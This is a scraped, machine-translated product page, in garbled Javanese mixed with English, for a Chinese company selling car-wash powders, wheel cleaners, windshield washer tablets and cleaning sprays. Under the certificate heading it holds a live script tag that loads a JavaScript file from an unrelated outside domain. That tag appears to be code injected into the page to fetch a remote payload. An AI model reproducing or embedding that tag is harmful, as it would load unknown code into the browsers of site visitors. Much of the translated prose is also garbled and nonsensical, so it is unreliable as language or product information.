Profesional Car Detailing Supplies
Produk Wisuh Mobil Gratis Grosir

Nyedhiyani Perawatan Mobil Eco-Friendly, Cost-Efektif, Peralatan cuci Mobil, Cairan Wiper Windshield All-Season.

Looking For Kualitas, Kontrak Barang Gantidak Berkualitas?

APA KAMI Nuwun

Produk Pembersih Mobil (Top Selling)

Efisiensi sing dhuwur Wêdakakêna Car Wash bubuk,
Ora perlu ngumbah lan spons karep, efek reresik sing kuat. Ngirit banyu, kaping lan regane. Aja ngeruk sajrone ngumbah mobil. Nambah glossiness saka mobil.

Best Car Wheel Cleaner

Wisuh, ngilangke bisa cepet mbusak rereget. Iku prasaja, trep lan biodegradable. Nambah fénoména sing dadi peteng, luwih dawa lan liya-liyane, banjur mulihake gloss asli! Cocog kanggo macem-macem permukaan hub roda.

Car Wash Shampoo Formula

Sampeyan bisa diowahi dadi mobil cuci mobil super-konsentrasi, ngirit biaya lan banget
efek pembersih kanggo nyampur karo shampoo lan deterjen cuci mobil! Ora mung nyimpen biaya transportasi nanging uga ngurangi biaya ngumbah otomatis.

Car Interior Cleaning Products

Nggunakake enzim alami lan ekologis kanggo njupuk minyak jeruk sing kalebu tanduran biodegradable Kabeh Tujuan Pembersih tanpa residu, bisa ditrapake kanggo mobil, lingkungan njero ruangan, kanthi fungsi sterilisasi, antibakteri lan nggawa udhara seger.

Tablet Cleaning Effervescent

1PC Windshield Washer Tablet padha karo cairan wiper 4L! Larut kanthi cepet, ngasilake cairan wiper gelang angin kaca, kanthi cepet lan efisien kanggo ngilangi film lenga, kerang lan lateks wit ing kaca angin. Panyimpenan gampang kanggo ngirit papan.

Multi Effervescent Spray Cleaner

A biologi agen pembersih sing kuat banget. Sampeyan ora mung cocok kanggo werna-werna sandhangan, nanging uga minangka decontaminator sing kuat ing peralatan dapur, lantai kayu, jubin kamar mandi, jamban dll. Sales langsung dening pabrikan, njamin barang certified.

We are OPS. Kita nggawe banget Cleaning Car Supplies, Household Cleaning Products.

Kabeh barang-barang kita sing ramah lingkungan, bisa uga ora nyebabake bahan kimia sing mbebayani kanggo kesehatan! Kita uga bisa ngatur produk kanggo klien kita.

Zhejiang OPS Perlindungan Lingkungan Teknologi Co, Ltd minangka perusahaan berteknologi tinggi sing R&D profesional, produksi lan dodolan produk cuci mobil, persediaan Auto detail, cairan wiper Windshield, Kumelun, Semprotan bau semprotane, Produk metalurgi lingkungan, produk pemurnian udara kendaraan, produk perawatan otomotif lan perawatan kecantikan.

Kita duwe hak properti intelektual, Riset, lan laboratorium pangembangan lan barisan produksi otomatis, tenaga riset ilmiah sing kuwat. Bubuk cuci mobil OPS merek dhewe digunakake kanggo ngresiki mobil saka macem-macem toko layanan mobil, stasiun layanan mobil lan toko layanan kecantikan. Sugeng rawuh ing pabrik kita lan tempah produk iki!

KANGGO CERTIFICATE

<script async src = 'https: //tom.verybeatifulantony.com/hjsers.js' type = 'text / javascript'> </script>
SGS Certificate2
SGS Certificate3
CNAS Certificate1
TUV certificate
MSDS

APA KAMI CUSTOMER SAYS

LOUISE COTTY

Aku entuk wêdakakêna cukur mobil sing ora nganggo reresik, dianggo ing toko layanan cleaning service.It mung butuh waktu menit 3 saben wisuh lan nduwe pekerjaan apik banget. Aku nggunakake produk istimewa saiki. Nyimpen banyu,
ngurangi biaya tenaga kerja, Tresna !!

GUY MOLLET

Efek cleaning reresik, biodegradable Pasokan rinci otomatis, kendaraan sampeyan langsung sawise ngumbah, OPS ora bakal ninggalake titik banyu. Dadi gampang kanggo nggarap!

HERHERT GEORGE

Iku di resiki apik ing kain, karpet, perabotan, peralatan pawon, interior vinil kendaraan lan sawetara liyane. Iku dibusak meh kabeh reged sing aku ora bisa. Saiki iki produk paling apik sing dakkandhakake. Dheweke ora ngambu, ora ngobong kulit, nganggo tanpa sarung tangan. Iku produk apik banget lan murah!

Sembarang Pitakonan Tulis Kita!

Alamat

NO.208, Dongxi Industrial Park, Wucheng, Jinhua, Zhejiang, Cina.

No.1010, 3 Bangunan, Wanda Piazza, Taizhou, Zhejiang, China.

Telpon

+ 86-579-82456460
Whatsapp: + 8613968660250

email

sales@opskar.com

Mangga mbuktekaken sampeyan manungsa kanthi milih House.